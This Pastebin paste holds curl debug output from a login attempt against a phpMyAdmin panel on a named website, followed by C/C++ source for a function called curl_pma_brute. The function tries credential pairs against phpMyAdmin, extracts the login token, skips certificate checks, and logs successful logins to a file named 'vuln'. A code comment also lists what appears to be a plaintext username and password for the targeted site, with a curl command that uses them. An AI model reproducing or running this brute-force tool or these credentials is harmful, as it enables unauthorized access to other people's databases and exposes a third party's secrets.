Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- > POST /phpMyAdmin-4.0.10.20-english/index.php HTTP/1.1
- Host: gangbangebony.com
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
- Accept: */*
- Cookie: phpMyAdmin=n17vf2r3rc532vvpqkmhua4hh7; pma_lang=en; __cfduid=d68021a412017ac69cee2890ea0b1e4371537310970
- Content-Length: 107
- Content-Type: application/x-www-form-urlencoded
- * upload completely sent off: 107 out of 107 bytes
- < HTTP/1.1 302 Found
- < Date: Tue, 18 Sep 2018 22:49:36 GMT
- < Content-Type: text/html; charset=UTF-8
- < Transfer-Encoding: chunked
- < Connection: keep-alive
- < Expires: Thu, 19 Nov 1981 08:52:00 GMT
- < Cache-Control: private, max-age=10800
- < Last-Modified: Wed, 29 Mar 2017 01:03:24 GMT
- * Added cookie pmaUser-1="%7B%22iv%22%3A%22Df2rfm2qxuyQAB72T94Ofw%3D%3D%22%2C%22mac%22%3A%226f210573fbb3eac515408aa1f8494c31058caedc%22%2C%22payload%22%3A%226e92Bq1dmn0Wqb3v9WmKYg%3D%3D%22%7D" for domain gangbangebony.com, path /phpMyAdmin-4.0.10.20-english/, expire 1539893577
- < Set-Cookie: pmaUser-1=%7B%22iv%22%3A%22Df2rfm2qxuyQAB72T94Ofw%3D%3D%22%2C%22mac%22%3A%226f210573fbb3eac515408aa1f8494c31058caedc%22%2C%22payload%22%3A%226e92Bq1dmn0Wqb3v9WmKYg%3D%3D%22%7D; expires=Thu, 18-Oct-2018 22:49:35 GMT; Max-Age=2592000; path=/phpMyAdmin-4.0.10.20-english/; HttpOnly
- * Added cookie pmaAuth-1="%7B%22iv%22%3A%221eErqOJZ3Hnh1uCuZaHZxQ%3D%3D%22%2C%22mac%22%3A%22f7e8be1ef302580aa119ec92e92f79e89176e033%22%2C%22payload%22%3A%220SgFKBMEBJg7DznBj8%5C%2FR8gL6eXVvGxzDYyKOCRVMuhlQQexB80iuDXewqNoan9Tc%22%7D" for domain gangbangebony.com, path /phpMyAdmin-4.0.10.20-english/, expire 0
- < Set-Cookie: pmaAuth-1=%7B%22iv%22%3A%221eErqOJZ3Hnh1uCuZaHZxQ%3D%3D%22%2C%22mac%22%3A%22f7e8be1ef302580aa119ec92e92f79e89176e033%22%2C%22payload%22%3A%220SgFKBMEBJg7DznBj8%5C%2FR8gL6eXVvGxzDYyKOCRVMuhlQQexB80iuDXewqNoan9Tc%22%7D; path=/phpMyAdmin-4.0.10.20-english/; HttpOnly
- < X-ob_mode: 0
- < Location: https://gangbangebony.com:80/phpMyAdmin-4.0.10.20-english/index.php?token=c91128b32c2eba468c76105237a238d8
- < Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
- < Server: cloudflare
- < CF-RAY: 45c75dd93b019cb9-AMS
- <
- * Ignoring the response-body
- * Connection #0 to host gangbangebony.com left intact
- * Issue another request to this URL: 'https://gangbangebony.com:80/phpMyAdmin-4.0.10.20-english/index.php?token=c91128b32c2eba468c76105237a238d8'
- * Switch from POST to GET
- * Found bundle for host gangbangebony.com: 0x1decdc0 [can pipeline]
- * Trying 104.27.153.115...
- * TCP_NODELAY set
- * Connected to gangbangebony.com (104.27.153.115) port 80 (#1)
- * ALPN, offering http/1.1
- * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
- * successfully set certificate verify locations:
- * CAfile: /etc/ssl/certs/ca-certificates.crt
- CApath: none
- * error:1408F10B:SSL routines:ssl3_get_record:wrong version number
- * Closing connection 1
- curl_easy_perform() failed: SSL connect error
- RES1=[0]
- int curl_pma_brute(char* url, char* user, char* pass, int debug_curl)
- {
- /*
- curl_version_info_data *d = curl_version_info(CURLVERSION_NOW);
- puts(d->version);
- puts(d->libssh_version);
- puts(d->ssl_version);
- exit(0);
- */
- int result = 0;
- CURL *curl_handle;
- CURLcode res;
- struct MemoryStruct chunk;
- char* curl_error;
- struct curl_slist *chunk_headers = NULL;
- char chunk_temp[4096];
- curl_global_init(CURL_GLOBAL_ALL);
- chunk.memory = (char*) malloc(1);
- chunk.size = 0;
- // CURL1
- curl_handle = curl_easy_init();
- curl_easy_setopt(curl_handle, CURLOPT_URL, url);
- curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
- curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
- curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
- curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
- // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
- /*
- memset(chunk_temp,0,sizeof(chunk_temp));
- sprintf(chunk_temp,"Host: %s",original_host);
- chunk_headers = curl_slist_append(chunk_headers, chunk_temp);
- curl_easy_setopt(curl_handle, CURLOPT_HTTPHEADER, chunk_headers);
- */
- curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
- // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
- // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
- // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST,"RC4-SHA");
- // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1");
- curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, "");
- if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
- // curl_easy_setopt(curl_handle, CURLOPT_FAILONERROR, 1L);
- // curl_easy_setopt(curl_handle, CURLOPT_UPLOAD, 1L);
- char user_pass[500];
- memset(user_pass,0,sizeof(user_pass));
- sprintf(user_pass,"%s:%s",user,pass);
- curl_easy_setopt(curl_handle, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
- curl_easy_setopt(curl_handle, CURLOPT_USERPWD,user_pass);
- // wp_porn:mywebsitepornnetwork32123@gangbangebony.com/phpMyAdmin-4.8.3-all-languages/
- // curl -vvv -k -u 'wp_porn:mywebsitepornnetwork32123' -H 'Accept: application/json' 'https://gangbangebony.com/phpMyAdmin-4.8.3-all-languages/' --trace-ascii - -X PROPFIND -D -
- res = curl_easy_perform(curl_handle);
- if(res != CURLE_OK)
- {
- curl_error = (char*) curl_easy_strerror(res);
- if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
- }
- else
- {
- if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
- if(debug_curl >=3) puts(chunk.memory);
- if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
- {
- result = 1;
- char temp_filename_line[500];
- memset(temp_filename_line,0,500);
- sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
- file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
- }
- else if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"name=\"pma_username\"") && strstr(chunk.memory,"name=\"pma_password\""))
- {
- std::string s1(chunk.memory);
- string delimiter1 = "name=\"token\"";
- string token1 = s1.substr(52, s1.find(delimiter1)); // token is "scott"
- token1 = s1.substr(s1.find(delimiter1)+20,32);
- // it is a box, post it
- curl_easy_setopt(curl_handle, CURLOPT_URL, url);
- curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
- curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
- curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
- curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
- // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
- curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
- // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
- // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
- // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1");
- curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, "");
- char post_string[500];
- memset(post_string,0,500);
- sprintf(post_string,"pma_username=%s&pma_password=%s&server=%s&token=%s",user,pass,"1",token1.c_str());
- curl_easy_setopt(curl_handle,CURLOPT_POSTFIELDS,post_string);
- if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
- res = curl_easy_perform(curl_handle);
- if(res != CURLE_OK)
- {
- curl_error = (char*) curl_easy_strerror(res);
- if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
- }
- else
- {
- if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
- if(debug_curl >=3) puts(chunk.memory);
- if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
- {
- result = 1;
- char temp_filename_line[500];
- memset(temp_filename_line,0,500);
- sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
- file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
- }
- }
- }
- }
- curl_easy_cleanup(curl_handle);
- free(chunk.memory);
- curl_global_cleanup();
- return result;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement